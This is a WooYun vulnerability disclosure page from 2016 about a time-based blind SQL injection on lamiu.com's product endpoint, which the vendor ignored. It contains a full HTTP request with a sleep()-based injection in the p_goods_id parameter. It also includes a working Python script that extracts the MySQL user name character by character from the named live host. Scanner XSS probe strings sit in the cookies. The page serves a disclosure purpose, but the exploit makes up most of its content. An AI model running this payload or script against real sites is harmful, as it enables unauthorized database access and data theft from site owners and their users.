当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170543

漏洞标题:兰缪主站存在SQL注入漏洞(附验证脚本)

相关厂商:lamiu.com

漏洞作者: 路人甲

提交时间:2016-01-17 12:20

修复时间:2016-01-22 12:30

公开时间:2016-01-22 12:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /index.php/product-getAdjunctPro.html?ijfitnfo HTTP/1.1
Content-Length: 306
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.lamiu.com/
Cookie: vary=static6dcd7865027f12ffefb2873dc41498a4; s=0da89b7ebdf6f1bcb64c1abeb4e286e1; S[SIGN][REMEMBER]=1; S[CART_COUNT]=131; S[CART_NUMBER]=315; S[CART_TOTAL_PRICE]=%EF%BF%A529889.00; cart[go_back_link]=http%3A%2F%2Fwww.lamiu.com%2F; S[GALLERY][FILTER]=cat_id%3D147%26virtual_cat_id%3D9%26virtual_cat_id%3D9%26p_1%5B%5D%3D286%26p_1%5B%5D%3D287%26p_1%5B%5D%3D288%26p_1%5B%5D%3D289%26p_1%5B%5D%3D290%26p_1%5B%5D%3D291%26p_3%5B%5D%3D304%26p_3%5B%5D%3D305%26p_3%5B%5D%3D306%26p_3%5B%5D%3D307%26p_6%5B%5D%3D324%26p_6%5B%5D%3D325%26p_6%5B%5D%3D326%26p_6%5B%5D%3D327%26p_7%5B%5D%3D328%26p_7%5B%5D%3D329%26p_7%5B%5D%3D330%26p_7%5B%5D%3D331%26p_8%5B%5D%3D333%26p_8%5B%5D%3D334%26p_8%5B%5D%3D335%26p_8%5B%5D%3D336%26p_9%5B%5D%3D337%26p_9%5B%5D%3D338%26p_9%5B%5D%3D339%26p_10%5B%5D%3D340%26p_10%5B%5D%3D341%26p_10%5B%5D%3D342%26p_13%5B%5D%3D355%26p_13%5B%5D%3D356%26s_5%5B%5D%3D93%26s_5%5B%5D%3D161%26s_5%5B%5D%3D100%26s_5%5B%5D%3D134%26s_5%5B%5D%3D115%26s_5%5B%5D%3D96%26s_5%5B%5D%3D164%26s_5%5B%5D%3D104%26s_5%5B%5D%3D136%26s_5%5B%5D%3D102%26s_5%5B%5D%3D109%26s_5%5B%5D%3D92%26s_5%5B%5D%3D94%26s_5%5B%5D%3D95%26s_5%5B%5D%3D98%26s_5%5B%5D%3D99%26s_5%5B%5D%3D101%26s_5%5B%5D%3D103%26s_5%5B%5D%3D105%26s_5%5B%5D%3D106%26s_5%5B%5D%3D107%26s_5%5B%5D%3D108%26s_5%5B%5D%3D110%26s_5%5B%5D%3D111%26s_5%5B%5D%3D112%26s_5%5B%5D%3D113%26s_5%5B%5D%3D114%26s_5%5B%5D%3D116%26s_5%5B%5D%3D117%26s_5%5B%5D%3D118%26s_5%5B%5D%3D119%26s_5%5B%5D%3D120%26s_5%5B%5D%3D121%26s_5%5B%5D%3D122%26s_5%5B%5D%3D123%26s_5%5B%5D%3D124%26s_5%5B%5D%3D125%26s_5%5B%5D%3D126%26s_5%5B%5D%3D127%26s_5%5B%5D%3D128%26s_5%5B%5D%3D129%26s_5%5B%5D%3D130%26s_5%5B%5D%3D131%26s_5%5B%5D%3D132%26s_5%5B%5D%3D133%26s_5%5B%5D%3D135%26s_5%5B%5D%3D137%26s_5%5B%5D%3D138%26s_5%5B%5D%3D139%26s_5%5B%5D%3D140%26s_5%5B%5D%3D141%26s_5%5B%5D%3D142%26s_5%5B%5D%3D143%26s_5%5B%5D%3D144%26s_5%5B%5D%3D145%26s_5%5B%5D%3D146%26s_5%5B%5D%3D147%26s_5%5B%5D%3D148%26s_5%5B%5D%3D149%26s_5%5B%5D%3D150%26s_5%5B%5D%3D151%26s_5%5B%5D%3D152%26s_5%5B%5D%3D153%26s_5%5B%5D%3D154%26s_5%5B%5D%3D155%26s_5%5B%5D%3D156%26s_5%5B%5D%3D157%26s_5%5B%5D%3D158%26s_5%5B%5D%3D159%26s_5%5B%5D%3D160%26s_5%5B%5D%3D162%26s_5%5B%5D%3D163%26s_5%5B%5D%3D165%26s_5%5B%5D%3D166%26s_5%5B%5D%3D167%26s_5%5B%5D%3D168%26s_5%5B%5D%3D169%26s_5%5B%5D%3D170%26s_5%5B%5D%3D171%26s_5%5B%5D%3D172%26s_5%5B%5D%3D173%26s_5%5B%5D%3D174%26s_5%5B%5D%3D175%26s_5%5B%5D%3D176%26s_5%5B%5D%3D177%26s_5%5B%5D%3D178%26s_5%5B%5D%3D179%26s_5%5B%5D%3D180%26s_5%5B%5D%3D181%26s_5%5B%5D%3D182%26s_5%5B%5D%3D183%26s_5%5B%5D%3D184%26s_5%5B%5D%3D185%26s_5%5B%5D%3D186%26s_5%5B%5D%3D187%26s_5%5B%5D%3D188%26s_5%5B%5D%3D189%26s_5%5B%5D%3D190%26s_5%5B%5D%3D191%26s_5%5B%5D%3D192%26s_5%5B%5D%3D193%26s_5%5B%5D%3D194%26s_5%5B%5D%3D195%26s_5%5B%5D%3D196%26s_5%5B%5D%3D197%26s_5%5B%5D%3D198%26s_5%5B%5D%3D199%26s_5%5B%5D%3D200%26orderBy%3D%26showtype%3Dgrid%26; S[SEARCH_KEY]=%BE%DB%C2%A3; S[FIRST_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452850458000%7D; S[NOW_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452850475000%7D; S[N]=AE592E85-E439-5248-EDC3-26450F7541C5; Hm_lvt_35dfb17676caeb2ba818819534646912=1452852660,1452852863,1452852941,1452852941; Hm_lpvt_35dfb17676caeb2ba818819534646912=1452852941; HMACCOUNT=84BCA4D31DF03561; S[BRAND][FILTER]=brand_id%5B%5D%3D15%26orderBy%3Dprice%20desc%26showtype%3Dgrid%26page%3D1
Host: www.lamiu.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goods_id=5255&p_goods_id=if(now()=sysdate(),sleep(if(length(user())=24,3,0)),0)

user长度为24

1.png

2.png

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type':'application/x-www-form-urlencoded'}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 25):
    
    for payload in payloads:
            
            s = "if(now()=sysdate(),sleep(if(ascii(substr(user(),%s,1))=%s,5,0)),0)" % (i, ord(payload))   
            
            s = "goods_id=5255&p_goods_id="+s
            
            conn = httplib.HTTPConnection('www.lamiu.com', timeout=90)
            start_time = time.time()
            conn.request('POST','/index.php/product-getAdjunctPro.html?ijfitnfo',s,headers)          
            h=conn.getresponse().read()
            conn.close()
            print '.',
            #print   time.time() - start_time 
            if time.time() - start_time > 5.0:
                user += payload
                print '\n\n[in progress]', user,
                break        
print '\n[Done] MySQL user is %s' % user

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-22 12:30

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无